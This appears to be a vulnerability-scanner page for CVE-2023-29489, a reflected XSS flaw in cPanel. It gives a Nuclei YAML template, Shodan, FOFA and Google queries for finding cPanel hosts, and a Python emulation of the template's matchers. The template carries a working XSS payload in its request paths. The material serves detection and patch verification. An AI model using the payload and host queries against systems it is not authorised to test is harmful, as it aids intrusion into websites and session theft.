cPanel < 11.109.9999.116 - Cross-Site Scripting
ID: CVE-2023-29489
Severity: medium
Author: DhiyaneshDk,0xKayala
Tags: cve,cve2023,cpanel,xss
Description
An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.
YAML Source
id: CVE-2023-29489

info:
  name: cPanel < 11.109.9999.116 - Cross-Site Scripting
  author: DhiyaneshDk,0xKayala
  severity: medium
  description: |
    An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by cPanel to fix this vulnerability.
  reference:
    - https://blog.assetnote.io/2023/04/26/xss-million-websites-cpanel/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-29489
    - https://forums.cpanel.net/threads/cpanel-tsr-2023-0001-full-disclosure.708949/
    - https://github.com/SynixCyberCrimeMy/CVE-2023-29489
    - https://github.com/learnerboy88/CVE-2023-29489
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-29489
    cwe-id: CWE-79
    epss-score: 0.00354
    epss-percentile: 0.71955
    cpe: cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cpanel
    product: cpanel
    shodan-query:
      - "title:\"cPanel\""
      - http.title:"cpanel"
      - cpe:"cpe:2.3:a:cpanel:cpanel"
      - http.title:"cpanel - api codes"
    fofa-query:
      - "title=\"cpanel - api codes\""
      - title="cpanel"
    google-query:
      - "intitle:\"cpanel - api codes\""
      - intitle:"cpanel"
  tags: cve,cve2023,cpanel,xss

http:
  - method: GET
    path:
      - '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaaaa'
      - '{{BaseURL}}/cpanelwebcall/<><img%20src=x%20onerror="prompt(document.domain)">'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src=x onerror="prompt(document.domain)">aaaaaaaaaaaa'
          - 'Invalid webcall ID:'
        condition: and

      - type: status
        status:
          - 400
# digest: 490a0046304402204717d5e08c37507ff8012a81d992eecfbd7989e8e4afb8ae242f3e26e5b8685e02200a824a3428816f14e421c57237f60470b7bf40b94b1a25cbef61853aebde2f7d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects the vulnerability by sending the requests above with the Nuclei scanner and checking the responses against the template's matchers. Run it against a target with:
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-29489.yaml"
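To make the template's decision rule concrete, the following added example (not part of the template or of Nuclei) emulates its matchers in Python: the word matcher requires both strings in the body (condition: and), the status matcher requires HTTP 400, and matchers-condition: and requires both. The three responses are constructed samples showing an unpatched build that reflects the webcall ID verbatim, a patched build that HTML-encodes it, and an unrelated 404 that echoes the path.

```python
import html

# The payload string the template's word matcher looks for in the body.
PAYLOAD = '<img src=x onerror="prompt(document.domain)">aaaaaaaaaaaa'

# Strings required in the body (the template's words list, condition: and).
WORDS = [PAYLOAD, 'Invalid webcall ID:']
# HTTP status required by the template's status matcher.
STATUS = 400


def template_matches(status: int, body: str) -> bool:
    """Return True when both template matchers would fire on this response.

    word matcher   -> every entry of WORDS is a substring of the body
    status matcher -> status == 400
    Combined with matchers-condition: and, both must hold.
    """
    word_matcher = all(w in body for w in WORDS)
    status_matcher = status == STATUS
    return word_matcher and status_matcher


# Constructed sample: unpatched cpsrvd echoes the invalid webcall ID unencoded.
VULNERABLE_RESPONSE = (400, f"<html><body>Invalid webcall ID: {PAYLOAD}</body></html>")

# Constructed sample: a patched build HTML-encodes the ID, so the literal
# payload never appears in the body even though the error text is the same.
PATCHED_RESPONSE = (400, f"<html><body>Invalid webcall ID: {html.escape(PAYLOAD, quote=True)}</body></html>")

# Constructed sample: a non-cPanel server that echoes the path in a 404.
OTHER_RESPONSE = (404, f"Not found: /cpanelwebcall/{PAYLOAD}")


if __name__ == "__main__":
    samples = {
        "vulnerable": VULNERABLE_RESPONSE,
        "patched": PATCHED_RESPONSE,
        "unrelated 404": OTHER_RESPONSE,
    }
    for label, (status, body) in samples.items():
        print(f"{label:14s} status={status} match={template_matches(status, body)}")
```

Only the first sample fires; the patched body still contains "Invalid webcall ID:" but the encoded payload no longer satisfies the word matcher.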